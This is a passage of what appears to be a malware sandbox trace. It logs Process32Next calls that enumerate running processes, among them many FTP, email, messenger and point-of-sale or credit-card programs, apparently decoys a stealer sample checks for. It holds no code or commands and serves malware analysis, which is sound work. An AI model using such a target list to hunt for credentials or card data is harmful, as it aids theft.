Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.880] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.881] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.883] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.884] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.886] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.985] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.986] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0250.988] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0250.990] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.992] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.994] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0250.995] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0251.001] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0251.003] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.005] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.007] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0251.008] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.010] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.011] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0251.016] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0251.017] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0251.019] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0251.020] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0251.022] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0251.023] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0251.025] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0251.026] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0251.049] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0251.051] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0251.052] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0251.054] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0251.055] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0251.057] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0251.058] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0251.063] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0251.064] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0251.066] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0251.067] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0251.068] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0251.073] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0251.075] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0251.076] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0251.078] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0251.079] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0251.081] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0251.083] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0251.085] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0251.086] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0251.094] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0251.096] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0251.098] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0251.100] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0251.101] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0251.103] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0251.105] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0251.111] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0251.113] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0251.116] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0251.118] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0251.120] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0251.125] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0251.127] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0251.130] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0251.132] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0251.135] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0251.220] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0251.280] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0251.288] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0251.290] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0251.292] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0251.299] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0251.301] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0251.304] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0251.306] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0251.312] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0251.315] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0251.317] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0251.319] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0251.321] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0251.323] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0251.452] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0251.455] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, 